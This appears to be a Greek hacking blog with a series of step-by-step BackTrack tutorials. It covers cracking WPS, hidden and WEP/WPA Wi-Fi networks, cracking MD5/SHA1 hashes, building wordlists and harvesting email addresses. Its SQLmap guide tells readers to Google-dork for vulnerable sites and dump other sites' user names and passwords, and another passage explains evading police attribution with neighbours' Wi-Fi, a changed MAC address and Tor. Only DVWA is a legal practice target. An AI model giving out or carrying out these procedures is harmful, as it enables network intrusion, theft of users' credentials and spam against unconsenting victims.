ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Τετάρτη 25 Ιανουαρίου 2012

DVWA - Damn Vulnerable Web App

DVWA ειναι μια εφαρμογη που σας επιτρεπει να εξασκηθειτε σε SQL injection ,XSS και διαφορα σε νομιμο περιβαλλον καθως θα κανετε επιθεση στην δικια σας σελιδα  μπορειτε να δοκιμασετε το sqlmap,sqlninja,hydra,και πολλα αλλα προγραμματα εισβολης σε μια ιστοσελιδα.


Τι θα χρειαστειτε;
1.Backtrack 5R1
2.DVWA download
3.Aυτοματο scritp  download



  • οταν εχετε κατεβασει το DVWA τοτε καντε το extract στον φακελο root 
  • μετα οταν εχετε κατεβασει το Auto.script καντε το να ειναι εκτελεσιμο με δεξι κλικ properties, επιλεξτε να ειναι executable και ανοιξτε το, run in terminal.
  • μετα πηγαινετε Applications -Backtrack-Services-MySQLD-mysql start
  • τελος πητηστε εδω  http://127.0.0.1/login.php βαλτε username 'admin' και password 'password'
  • μετα πατηστε setup και create database και εχετε φτιαξει τα δεδομενα σας
  • τωρα ειστε ετοιμοι να κανετε τις εισβολες σας σε νομιμο περιβαλλον




Πέμπτη 19 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα δικτυο WPA/WPA2 με WPS

Τι θα χρειαστεις;

1.Backtrack 5 R1
2.Reaver
3.WPA/WPA2 δικτυο με Wifi Protected Setup


  • Παταμε εδω και κατεβαζουμε το Reaver
  • μετα αφου το αρχειο reaver-1-3.tar.gz  εχει κατεβει και ειναι στον φακελο root ανοιγουμε ενα τερματικο και γραφουμε
  • tar zxvf reaver-1-3.tar.gz
  • μετα cd reaver-1-3
  • cd src
  • ./configure
  • make
  • make install
  • και ειμαστε ετοιμοι να αρχισουμε (αποσυνδεουμε το δικτυο μας)
  • airmon-ng start wlan0
  • walsh -i mon0 -C
  • βλεπουμε ποιο δικτυο εχει WPS σημειωνουμε την mac address , παταμε ctrl+c  και παμε με το reaver για να το σπασουμε
  • γραφουμε  reaver -i mon0 -b 00:24:40:48:99:99 -vv
  • οπου 
  • -b την mac address του δικτυου που θελουμε να σπασουμε 
  • -vv βαζουμε για να μας δειχνει λεπτομερως τι γινετε
  • αν γραψετε μονο reaver θας σας εμφανισει ολες τις επιλογες που μπορειτε να εφαρμοσετε
  • περιμενουμε και μας εμφανιζει τον κωδικο
  • αν θελετε μπορειτε να πατησετε ctrl+c και να συνεχισετε οποτε εσεις θελετε γιατι σε μερικα ρουτερ κραταει ωρες πχ οταν δοκιμαζει το reaver τους κωδικους, το ρουτερ μετα απο καποιες προσπαθειες κλειδωνει και μετα απο 5 λεπτα δεχετε αλλες προσπαθειες για κωδικους
  • Επιπλεον επιλογες του reaver που θα σας φανουν χρησιμες
  • -a βρισκει αυτοματα τις καλυτερες ρυθμισεις σπασιματος για το δικτυο
  • - l βαλτε ποσος χρονος θα ειναι η αναμονη για να ξαναπροσπαθησει το σπασιμο πχ. -l 630 * οταν σας λεει Warning AP detected limited time retrying .....εφαρμοζετε αυτη την επιλογη συνηθως πανω απο 315 δευτερα βαζετε.
  • -r βαζετε τον χρονο αναμονης στις  ποσες προσπαθειες δλδ -r 315:4 θα κανει 4 προσπαθειες και μετα θα περιμενει πεντε λεπτα και 15 δευτερα μεχρι να ξαναρχισει
  •  -t βαζετε τον χρονο αναμονης ληψης αναμεσα απο καθε προσπαθεια σπασιματος ( pin attemps) δλδ κανετε μια προσπαθεια και περιμενετε αποτελεσμα αυτο τον χρονο ρυθμιζετε οταν σας λεει waarning receive timeout occur συνηθως το αλλαζετε σε μεγαλυτερο
  • -L αγνοειτε το κλειδωμα του ρουτερ και τον χρονο αναμονης που πρεπει να περιμενετε.
  • -S στελνετε μικροτερα πακετα και επιταχυνει το χρονο του σπασιματος
  • τις επιλογες πρεπει να τις βαλετε μετα το -vv  δλδ
  • reaver -i mon0 -b <mac_address> -vv -a -l 630 -r 630:4 -t 5 -L -S κτλ..... 
  • Με αυτη την επιθεση του reaver δεν χρειαζετε να ειναι συνδεδεμενος κανενας χρηστης ουτε χρειαζονται λεξικα για να σπασει το δικτυο επισεις μπορειτε να συνεχισετε οποτε θελετε απο εκει που ειχατε μεινει.

 Πως να προστατευτειτε;

1.Απενεργοποιηστε το WPS στο ρουτερ σας

Τετάρτη 18 Ιανουαρίου 2012

Πως σπαμε Μd5/Sha1 κωδικοποιησεις με john the Ripper


Τι θα χρειαστειτε?

1.Backtrack 5 R1


  • Πρωτα αναγνωριζουμε τον κωδικο τι κωδικοποιηση εχει αν md5 η sha1
  • md5 εχουνε 32 ψηφια fd144f65f19df1c7adaa116c44ce2617 
  • sha1 εχουνε 40 ψηφια 54274c1b66e4db9103a52754b9f88c07567bd846
  • και  στα 2 ειναι κωδικοποιημενο το ονομα Nick
  • Ανοιγουμε ενα τερματικο και γραφουμε 
  •  cd /pentest/passwords/john
  • μετα john --format=raw-md5 /root/md5.txt
  • οπου 
  •  --format= βαζουμε την κωδικοποιηση
  • και /root/md5.txt το αρχειο που εχουμε αποθηκευσει τους κωδικους μεσα
  • οταν μας εμφανισει 
  • No password hashes left to crack
  • γραφουμε john --format=raw-md5  --show /root/md5.txt
  • και μας εμφανιζει τους κωδικους
      Κωδικοποιησεις  που σπαει το john the ripper
  • des/bsdi/md5/bf/afs/lm/bfegg/dmd5/dominosec/epi/hdaa/ipb2/krb4/krb5/mschapv2/mysql-fast/mysql/netlm/netlmv2/netntlm/netntlmv2/nethalflm/ssha/nsldap/md5ns/nt/openssha/phps/po/xsha/crc32/hmac-md5/lotus5/md4-gen/mediawiki/mscash/mscash2/mskrb5/mssql/mssql05/mysql-sha1/oracle11/oracle/phpass-md5/pix-md5/pkzip/raw-md4/raw-md5/raw-sha1/raw-md5u/salted-sha1/sapb/sapg/sha1-gen/trip/raw-sha224/raw-sha256/raw-sha384/raw-sha512/xsha512/hmailserver/sybasease/crypt/ssh/pdf/rar/zip/dummy/dynamic_n
* goog.li σελιδα κωδικοποιησης/αποδικoποιησης και σας βοηθαει να αναγνωρισετε τι ειδος κωδικοποιησης εχει ενας κωδικος

Πως θα σερφαρετε ανωνυμα;


Τι θα χρειαστειτε?

1.Backtrack 5 R1
2.Tor

  • Ανοιγουμε ενα τερματικο και γραφουμε 
  • lsb_release -c
  • και μας εμφανιζει τι διανομη linux εχουμε
  • πχ lucid
  • πηγαινουμε και ανοιγουμε με gedit το αρχειο /etc/apt/sources.list
  • και προσθετουμε κατω αυτη την γραμμη
  • deb     http://deb.torproject.org/torproject.org <DISTRIBUTION> main
    *οπου <destribution> μας την εμφανιζει η πρωτη εντολη που γραψαμε 
  • deb     http://deb/torproject.org/torproject.org lucid main
  • το αποθηκευουμε και το κλεινουμε
  • γραφουμε στο τερματικο
  • gpg --keyserver keys.gnupg.net --recv 886DDD89 
  • μας εμφανιζει αυτο
  • gpg: Total number processed: 1
    gpg:              unchanged: 1
  • μετα γραφουμε 
  • gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
  • μας εμφανιζει ΟΚ
  • μετα apt-get update
  • apt-get install tor tor-geoipdb
  • εχουμε εγκαταστησει το tor χωρις προβληματα παταμε εδω επιτρεπουμε να κανουμε εγκατασταση το torbutton κανουμε ενα restart του firefox και θα δουμε ενα κρεμμυδι αριστερα πανω παταμε πανω του και επιλεγουμε Toggle Tor status οταν γινει πρασινο παταμε εδω για να κοιταξουμε αν εχουμε ρυθμισει σωστα το Tor
  • επισεις μπορειτε να το ελενξετε και εδω αν λεει αλλη ip χωρας ειστε ενταξει αν λεει ip της Ελλαδας τοτε δεν ειστε ενταξει.
Προσοχη

Μερικοι χρησιμοποιουνε το Tor για επιθεσεις σε σελιδες ετσι ωστε να μην εντοπιζοντε
ο καλυτερος τροπος για να μην εντοπιστεις ειναι να χρησιμοποιεις ξενο ασυρματο δικτυο να εχεις αλλαξει την Mac addresss σου και επισεις οταν κανεις την επιθεση να μην μπεις σε καμια σελιδα με τα προσωπικα σου δεδομενα οπως Facebook,hotmail,Gmail κτλ αλλα και παλι αν ειναι να σε εντοπισουνε θα σε εντοπισουνε εφοσον εχεις διαπραξει σοβαρο αδικημα και για να το καταλαβετε σωστα πχ εγω κανω μια επιθεση σε μια σελιδα


Εγω---->tor1---->tor2----->tor3------>tor4--->σελιδα
σελιδα--->tor4--->tor3--->tor2--->tor1--->σε εμενα
δλδ η σελιδα ξερει μονο τον tor4,o tor4 τον tor3 κτλ



οποτε για να με εντοπισουνε πρεπει να βρουνε τα ιχνη του tor4 να πανε στον tor3 μετα tor2 κτλ μεχρι να φτασουνε σε εμενα και μιλαμε για μεγαλη βαση δεδομενων και αν φτασουνε σε εμενα θα φτασουνε στην isp υπηρεσια πχ forhtnet η οποια θα τους πει που ειναι το ρουτερ μου εφοσον εχω διαπραξει καποιο αδικημα αλλα εφοσον δεν ειναι δικο μου το δικτυο και κλεβω ασυρματα θα ερθουνε στην οικια του ρουτερ δλδ καπου κοντα στην γειτονια μου και θα με εντοπισουνε με την mac address μου αλλα εγω την εχω αλλαξει οποτε δεν μπορουνε να κανουνε ταυτοποιηση οτι οντως εγω εκανα την επιθεση βεβαια κανεις δεν ειναι 100% ανωνυμος στο διαδικτυο




Δευτέρα 16 Ιανουαρίου 2012

Πως να κλεβετε στοιχεια απο ιστοσελιδες (SQLmap)


Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • παμε στο google και κανουμε αναζητηση .php?id=  gr
  • θα μας εμφανισει  ελληνικες και ξενες σελιδες που μπορει να ειναι ευαλωτες σε sql injection
  • επιλεγουμε και ανοιγουμε την σελιδα και στην url βαζουμε ' στο τελος
  • αν μας βγαλει MYSQL warning  η Mysql syntax error τοτε ειναι 100% ευαλωτη
  • *η κατεβαζετε το text αρχειο με Google Dorks download
  • το ανοιγετε κανετε αντιγραφη μια σειρας και επικοληση στην αναζητηση του Google
  • *η κατεβαζετε το  XcodeExploitScanner download
  •  οταν το εχουμε κατεβασει κανουμε extract και μετα παμε στο XcodeExploitScanner.exe δεξι κλικ και εκτελεση ως διαχειριστης
  • εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες
  • μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες
  • πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack
  • *περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google
  • Ανοιγουμε ενα τερματικο και γραφουμε
  •  cd /pentest/database/sqlmap
  • οποτε παμε στο τερματικο μας και γραφουμε 
  • ./sqlmap.py -u [url] --beep
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --beep  
  •  οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα
  • μετα γραφουμε
  • ./sqlmap.py -u [url] --dbs
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dbs
  • θα μας εμφανισει τα Database πχ

  • available databases [6]:
    [*] dswa
    [*] dswa_stage
    [*] dswawordpress
    [*] information_schema
    [*] mysql
    [*] test 

  • ./sqlmap.py -u [url] --tables -D [database]
  •  μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --tables -D dswa

  • Database: dswa
    [104 tables]
    +-----------------------------------+
    | access                         
    | accesslog                    
    | actions                        
    | actions_aid                  
    | advanced_help_index  
    | authmap                      
    | autologout                   
    | batch                           
    | blocks                          
    | blocks_roles                
    | boxes                            
    | cache                            
    | cache_block                      
    | cache_content                    
    | cache_filter                     
    | cache_form                       
    | cache_menu                       
    | cache_page                       
    | cache_update                     
    | cache_views                      
    | cache_views_data                 
    | comments                         
    | content_access                   
    | content_field_headername         
    | content_group                    
    | content_group_fields             
    | content_node_field               
    | content_node_field_instance      
    | content_type_education_center_sub
    | content_type_find_alliance       
    | content_type_member_home_page    
    | content_type_member_page         
    | content_type_page                
    | content_type_page_ns             
    | content_type_story               
    | dswa_chapters_main               
    | dswa_chapters_persons            
    | dswa_eventuity_additional        
    | dswa_eventuity_link              
    | dswa_eventuity_main              
    | dswa_profile_additional          
    | dswa_profile_geographic          
    | dswa_profile_images              
    | dswa_profile_main                
    | dswa_store_categories            
    | dswa_store_featured              
    | dswa_store_featured_sample       
    | dswa_store_images                
    | dswa_store_product_categories    
    | dswa_store_products              
    | dswa_taq_articles                
    | dswa_taq_quotes                  
    | dswa_taq_tips                    
    | dswa_taq_topics                  
    | dswa_teleclasses_additional      
    | dswa_teleclasses_main            
    | dswa_teleclasses_speakers        
    | dswa_whatsnew_main               
    | dswa_whatsnew_order              
    | fckeditor_role                   
    | fckeditor_settings               
    | files                            
    | filter_formats                   
    | filters                          
    | flood                            
    | history                          
    | menu_custom                      
    | menu_links                       
    | menu_router                      
    | node                             
    | node_access                      
    | node_comment_statistics          
    | node_counter                     
    | node_revisions                   
    | node_type                        
    | performance_detail               
    | performance_summary              
    | permission                       
    | profile_fields                   
    | profile_values                   
    | role                             
    | search_dataset                   
    | search_index                     
    | search_node_links                
    | search_total                     
    | semaphore                        
    | sessions                         
    | system                           
    | term_data                        
    | term_hierarchy                   
    | term_node                        
    | term_relation                    
    | term_synonym                     
    | upload                           
    | url_alias                        
    | users                            
    | users_roles                      
    | variable                         
    | views_display                    
    | views_object_cache               
    | views_view                       
    | vocabulary                       
    | vocabulary_node_types            
    | watchdog                         
    +-----------------------------------+
  • ./sqlmap.py -u [url] --columns -T [table name] -D [databasename]
  • πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --columns -T user -D dswa
  • Database: dswa
    Table: users
    [19 columns]
    +------------------+------------------+
    | Column           | Type       |
    +------------------+------------------+
    | access         | int(11)        |
    | created        | int(11)        |
    | data             | longtext     |
    | init              | varchar(64) |
    | language     | varchar(12)|
    | login            | int(11)        |
    | mail             | varchar(64)|
    | mode           | tinyint(4)   |
    | name           | varchar(60)|
    | pass            | varchar(32) |
    | picture       | varchar(255) |
    | signature    | varchar(255)|
    | signature_format | smallint(6) |
    | sort             | tinyint(4)       |
    | status          | tinyint(4)       |
    | theme          | varchar(255)|
    | threshold     | tinyint(4)     |
    | timezone     | varchar(8)  |
    | uid              | int(10) unsigned |
    +------------------+------------------+
  • ./sqlmap.py -u [url] --dump -C [column] -T [table name] -D [databasename]
  •  πχ ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C pass -T users -D dswa
  • πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 
  •  ./sqlmap.py -u www.selidathyma.com./php?id=17 --dump  -C name -T users -D dswa
  • και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα
  • και ετσι κλεβετε διαφορες πληροφοριες απο μια σελιδα
  • *κακοβουλοι χρηστες κανουνε αυτη την επιθεση με την χρηση του Tor ετσι ωστε να μην εντοπιστουνε.  
  • σχετικο αρθρο που μπορει να σας βοηθησει εδω 
  • η επιλογη --tor στο sqlmap χρησιμοποιει proxy και δεν μπορουν να σας εντοπισουν την ip


Πως θα προστετευτειτε;
1.Μην κανετε εγγραφη σε ευαλωτες σελιδες γιατι με αυτο τον τροπο θα κλεψουνε ονοματα/κωδικους και διαφορα προσωπικα στοιχεια σας τα οποια μπορουνε να χρησιμοποιησουνε για να εισβαλουνε  στο συστημα σας η στην προσωπικη αλληλογραφια σας 
2.Ποτε μην βαζετε προσωπικα δεδομενα σε σελιδες

Σάββατο 14 Ιανουαρίου 2012

Πως να μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας

Με αυτο τον οδηγο θα σας δειξω πως θα μαζευετε διευθυνσεις ηλεκτρονικης αλληλογραφιας απο yahoo,hotmail,gmail κτλ

Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Ανοιγω ενα τερματικο και γραφουμε msfconsole
  • back
  • use gather/search_email_collector
  • set DOMAIN hotmail.gr 
  • set outfile /root/email.txt
  • run 
  • και θα μας τα εμφανισει και θα τα αποθηκευσει στον φακελο /root σε αρχειο email.txt

  • με αυτο τον τροπο οι spammers και οι διαφημιστες συγκεντρωνουν emails και στελνουνε διαφορα



Πως θα προστατευτειτε;

1.Στο προφιλ σας βγαλτε να ειναι δημοσιο το email σας
2.Και ποτε μην βαζετε το email σας δημοσια σε forum,κοινωνικα δικτυα κτλ

Πως να επιταχυνετε το μTorrent





Τι θα χρειαστειτε;

1.Συνδεση στο ιντερνετ
2.μTorrent

  • Ανοιγουμε το μTorrent και παταμε ctrl+p και μας ανοιγει τις επιλογες 
  • πηγαινουμε συνδεση και εφαρμοζουμε τις ρυθμισεις οπως στην εικονα
  • μετα παμε Ευρος ζωνης και εφραμοζουμε τις ρυθμισεις οπως στην  κατω εικονα
  • μετα BitTorrent οπως στην εικονα
  • μετα προτεραιοτητα οπως στην εικονα κατω
  • και προχωρημενες παμε στο net.max_halfopen και βαζουμε 90 τιμη
  • Τελος .Ειμαστε ετοιμοι να κατεβαζουμε με την μεγιστη ταχυτητα που μπορουμε *οταν κατεβαζετε να κοιτατε τους seeders να ειναι περισσοτεροι απο τους leechers δλδ με απλα λογια να κοιτατε αυτους που το ανεβαζουνε να ειναι περισσοτεροι απο αυτους που το κατεβαζουνε



Τρίτη 10 Ιανουαρίου 2012

Πως θα φτιαξετε δικιες σας λιστες κωδικων για σπασιμο δικτυων


Με αυτο τον οδηγο θα μαθετε να φτιαχνετε λιστες κωδικων


Τι θα χρειαστειτε;

1.Backtrack 5 R1


  • ανοιγουμε ενα τερματικο και γραφουμε 
  • cd /pentest/passwords/crunch
  • μετα ./cruch 4 4 1234567890 -o /root/lexiko.txt
  • με αυτην την εντολη θα δημιουργησετε απο το 0000-9999
  • οπου
  • ''1234567890'' τι θα χρησιμοποιησει για να φτιαξει κωδικους
  • 4 4 το μηκος των κωδικων δλδ 4ψηφια
  • -ο /root/lexiko.txt οτι θα τα αποθηκευσει στον φακελο root σε lexiko.txt ετσι ωστε να το βρειτε ποιο ευκολα
  • ./crunch 4 4 -f charset.lst lalpha -o /root/lexiko.txt
  • με αυτη την εντολη θα δημιουργησετε απο το aaaa-zzzzz
  • οπου
  • 4 4  4ψηφια δλδ το μηκος των κωδικων
  • -f charset.lst οι χαρακτηρες μπορειτε να επιλεξετε πχ απο εδω
  • hex-lower=[0123456789abcdef]
    hex-upper=[0123456789ABCDEF]
    numeric=[0123456789]
    numeric-space=[0123456789 ]
    symbols14=[!@#$%^&*()-_+=]
    symbols14-space=[!@#$%^&*()-_+= ]
    symbols-all=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    symbols-all-space=[!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    ualpha=[ABCDEFGHIJKLMNOPQRSTUVWXYZ]
    ualpha-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    ualpha-numeric=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-space=[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    ualpha-numeric-symbol14= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    ualpha-numeric-symbol14-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
    ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    ualpha-numeric-all-space= [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    lalpha=[abcdefghijklmnopqrstuvwxyz]
    lalpha-space=[abcdefghijklmnopqrstuvwxyz ]
    lalpha-numeric=[abcdefghijklmnopqrstuvwxyz0123456789]
    lalpha-numeric-space=[abcdefghijklmnopqrstuvwxyz0123456789 ]
    lalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
    lalpha-numeric-symbol14-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
    lalpha-numeric-all=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    lalpha-numeric-all-space=[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
    mixalpha=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
    mixalpha-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
    mixalpha-numeric=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
    mixalpha-numeric-space=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
    mixalpha-numeric-symbol14=[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
    mixalpha-numeric-symbol14-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
    mixalpha-numeric-all= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    mixalpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
  • πχ αν θελω να φτιαξω μια λιστα με ονομα και κωδικο οπως Nikos99 δλδ το ονομα και ημερομηνια γεννησης
  • ./crunch 7 7 -f charset.lst numeric -t Nikos%% -o /root/nikos.txt
  • και θα δημιουργησει μια λιστα απο Nikos00-Nikos99
  • οπου 7 7 το μηκους των κωδικων εφοσον το Nikos ειναι ηδη 5 και 2 τα τελευταια ψηφια θα ειναι 7
  • -f τι χαρακτηρες θα χρησιμοποιησει
  • -t την βαση που δεν θα αλλαζει και %% θα βαζει αριθμους αν @@ θα βαζει γραμματα αν ^^ θα βαζει ειδικους χαρακτηρες χαρακτηρες
  • -ο που θα αποθηκευτει
  • ./crunch 10 10 -f charset.lst numeric -t 694%%%%%%% -o /root/kinhta.txt
  • θα δημιουργησετε μια λιστα απο ολα τα κινητα 694 απο 6940000000-6949999999 η οποια θα ειναι 104.9 mb  
  • *επιπλεον επιλογες
  • -b χωριζετε σε μεγεθος δλδ αν ειναι 100mb μπορειτε να την χωρισετε σε 50mb 2 αρχεια πχ -b KB / MB / GB (πρεπει να το χρησιμοποιησετε με -o START *START ειναι το προσωρινο αρχειο που αποθηκευετε η λιστα θα την βρειτε /pentest/passwords/crunch
  • -c  χωριζετε σε γραμμες αντι για μεγεθος 100000 ειναι περιπου 1mb (-o START)
  • -e ποτε θα σταματισει πχ αν θελω να δημιουργησω απο το 00000-99999 μπορω να το σταματησω στο 33333
  • -r συνεχιζω την λιστα αν την εχω σταματησει
  • -s βαζω την λιστα μου να αρχισει απο καπου πχ ./crunch 4 4 123456789 -s 4444 θα αρχισει απο 4444 και η λιστα θα ειναι 4444-9999 
  • -z συμπιεζω την λιστα -z gzip, bzip , lzma
και ετσι φτιαχνετε τις λιστες σας

Δευτέρα 9 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα κρυφο ασυρματο δικτυο


Με αυτο τον οδηγο θα μπορειτε να βρειτε το ονομα απο ενα κρυφο ασυρματο δικτυο και τον κωδικο(δεν ευθυνομαι για κακοβουλη χρηση του σε ξενα δικτυα καθως ειναι παρανομο να μοιραζεσαι το δικτυο χωρις την συγκαταθεση του ιδιοκτητη)


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Υπαρχουνε 2 τροποι
  • με το aireplay-ng και με το mdk3
Aireplay-ng (αν υπαρχει καποιος ηδη συνδεδεμενος)
  • οταν το ψαξουμε με το wicd network manager θα μας το εμφανισει ετσι 

  • ανοιγουμε ενα τερματικο και γραφουμε 
  • airmon-ng start wlan0
  • airodump-ng mon0 και οταν δουμε με ονομα <length:  6>δλδ εμενα το ονομα ειναι 6 γραμματα αν λεει  <lenght 3> ειναι 3 κτλ.
  • airodump-ng -w kryfo --bssid 00:1F:9F:8E:53:9B -c 1 mon0
  • οπου 
  • -w το ονομα που θα αποθηκευοντε οι πληροφοριες
  • --bssid η mac address του ασυρματου δικτυου
  • -c το καναλι που εκπεμπει το δικτυο
  • βαλαμε το airodump-ng να ακουει συγκεκριμενα σε αυτο το δικτυο
  • αν δουμε καποιον station συνδεδεμενο τοτε γραφουμε
  • aireplay-ng -0 4 -a 00:1F:9F:8E:53:9B -c 00:34:45:45:45:34 mon0
  • οπου 
  • -0 deauthentication ποσες φορες θα κανουμε
  • -a η mac address του δικτυου
  • -c η mac address του χρηστη(station)
  • οταν πιασουμε το handshake θα μας εμφανισει και το ονομα του δικτυου
  • οποτε μετα μπορουμε να συνεχισουμε το σπασιμο του δικτυου
  • για wpa απλα εφοσον εχουμε πιασει το handshake απλα γραφουμε την εντολη aircrack-ng /root/kryfo*.cap -w /root/lexika/lexiko.txt 
  • οπου 
  • -w στο φακελο οπου εχετε το λεξικο σας
Mdk3
  • γραφουμε σε ενα τερματικο airmon-ng start wlan0 *αν δεν το εχουμε ξεκινησει απο πριν
  • airodump-ng mon0 ωστε να δουμε το bssid και το καναλι του δικτυου μετα το σταματαμε με ctrl+c και παλι airodump-ng -w * --bssid * -c * mon0
  • και ανοιγουμε ενα αλλο τερματικο και γραφουμε
  • mdk3 mon0 p -b a -c 1 -t 00:1F:9F:8E:53:9B -s 1000
  • οπου p -b ειναι το σπασιμο με brutalforce για το δικτυο
  • -c το καναλι
  • -b a για ολους τους χαρακτηρες
  • -b u για κεφαλαια γραμματα
  • -b l για μικρα γραμματα
  • -b n για αριθμους
  • -t η mac address του δικτυου
  • -s ποσα πακετα θα στελνουμε (καλυτερα μην χρησιμοποιησετε αυτη την επιλογη γιατι σε ορισμενες καρτες δεν δουλευει)
  • * -f αν θελετε να κοιταει σε αρχειο.txt για τα ονοματα
  • θα σας δειξει και αλλα δικτυα που ειναι στο καναλλι  απλα αφηστε το μεχρι να τελειωσει και θα σας εμφανισει το ονομα οπως εδω

  • για wep  εχουμε ξεκινησει το airodump-ng στο συγκεκριμενο δικτυο οπως πανω γραφουμε σε ενα τερματικο aireplay-ng -1 0 -a bssid mon0
  • μετα aireplay-ng -3 -b bssid mon0 
  • *(bssid = mac address του δικτυου)
  • οταν φτασουν τα πακετα πανω απο 5000
  • ανοιγω ενα αλλο τερματικο και γραφω 
  • aircrack-ng /root/kryfo*.cap
*οταν τελειωσω και βρω κωδικο και ονομα παω στο wicd Network Manager 
παταω Network -find a hidden network γραφω το ονομα βαζω και τον κωδικο στο properties και τελος

Πως θα προστατευτειτε;

1.Να εχετε wpa2 κρυπτογραφηση στο δικτυο σας με δυσκολο κωδικο και αν θελετε μπορειτε να κρυψετε το δικτυο σας ανουσιο βεβαια αλλα θα δυσκολεψει αρκετα τον αλλον ωστε να βρει ονομα και κωδικο....
2.Καντε ενσυρματη την συνδεση σας στο διαδικτυο

Κυριακή 8 Ιανουαρίου 2012

Πως εντοπιζω ενα email

Με αυτο τον οδηγο θα σας δειξω πως να εντοπισετε τα ιχνη της φυσικης διευθυνσης απο οπου σταλθηκε το email.


Τι  θα χρειαστειτε;

1.Firefox ή IE

  • πηγαινουμε στο email μας πχ για hotmail παταω δεξι κλικ στο μηνυμα που θελω να εντοπισω και παταω εκει που λεει προβολη προελευσης μηνυματος 



  • θα σας ανοιξει μια καινουργια καρτελα οπως εδω
  • και βλεπετε προσεχτικα την ip sender 
  • μετα πηγαινετε στο  http://www.ip-adress.com/ip_tracer/ και γραψτε την ip πχ εγω πηρα ενα μηνυμα της Groupon  και ανακαλυψα οτι το μηνυμα σταλθηκε απο Γερμανια.το οποιο μας λεει οτι η Groupon ειναι Γερμανικη εταιρεια και η Ελληνικη ειναι franchise.

     
    Απλα να ξερετε οτι το email το εντοπιζετε μεχρι την ISP υπηρεσια του
    και οχι στο σπιτι του αποστολεα και για να το εντοπισετε ακριβως πρεπει να επικοινωνησετε με την υπηρεσια πχ για Ελλαδα Forthnet ,ΟΤΕ,Ηol κλπ  και μονο αυτες μπορουνε να σας δωσουνε την ακριβη τοποθεσια εφοσον υπαρχει λογος σοβαρος(συνηθως οταν υπαρχει ποινικη διωξη)

     

     

Σάββατο 7 Ιανουαρίου 2012

SendEmail καντε πλακα στους φιλους και γνωστους σας

Με αυτο τον οδηγο θα σας δειξω πως μπορειτε να στειλετε email και να βαλετε οτι email θελετε για αποστολεα
* ο οδηγος εχει ανανεωθει 13.01.2015*


Τι θα χρειαστειτε;

1.Backtack 5 R1 / Kali Linux


*Για Kali linux
 leafpad /usr/share/perl5/IO/Socket/SSL.pm
και αλλαζουμε  την γραμμη
